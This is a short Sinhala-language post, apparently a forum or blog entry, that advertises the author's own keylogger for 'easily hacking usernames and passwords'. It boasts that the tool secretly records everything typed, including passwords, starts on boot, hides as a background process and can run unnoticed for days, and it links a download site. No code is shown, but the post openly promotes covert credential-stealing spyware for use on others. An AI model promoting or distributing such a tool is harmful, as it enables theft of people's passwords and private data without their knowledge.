ලේසියෙන්ම username password hack කරමු.

ඔන්න ඉතින් ලේසියෙන්ම hack කරන්න කැමති අයට මගේම tool එකක් හදුන්වාදෙන්නයි යන්නේ ..

keyboard එකෙන් type කරන දේවල් user ටත් නොදැනෙන්න save කරගන්න පුළුවන්
username ,password ,සහ තවත් type කරන දේවල් ... save කරගන්න පුළුවන්

Download සහ වැඩිවිස්තර :-
http://keylogger.rf.gd/

මේක keylogger එකක්. අනිත් keylogger අතර මේක විශේෂ වන ගොඩක් දේවල් මේකෙතියනවා .
1) keylogger නැවත නැවත start කිරීමට උවමනානෑ (pc එක start කරපුගමන් keylogger එකත් start වනවා.)
2)මේක save වන text file එක ඕනෑම තැනකට save කරන්න පුළුවන් (save file location)
3)කාටවත්ම හිතාගන්නවත්ම බැ මෙහෙම එකක් run වෙනවකියල (background process)

මෙම keylogger එක auto start වනනිසා දවස් ගානක් උනත් දාලා තියලා වැඩේ කරගන්න පුළුවන්

Download සහ වැඩිවිස්තර :-
http://keylogger.rf.gd/

keylogger website එක සදහා පැමිණි මුළු ගණන :-
http://tsnsoftanalytics.epizy.com/

අපි ගැන :-
keylogger by TSNsoft
https://www.facebook.com/tsnsoft

Comments

ඔයත් එකතු වෙන්න දැන්ම Log වෙන්න. හෝ Geek කෙනෙක් වෙන්න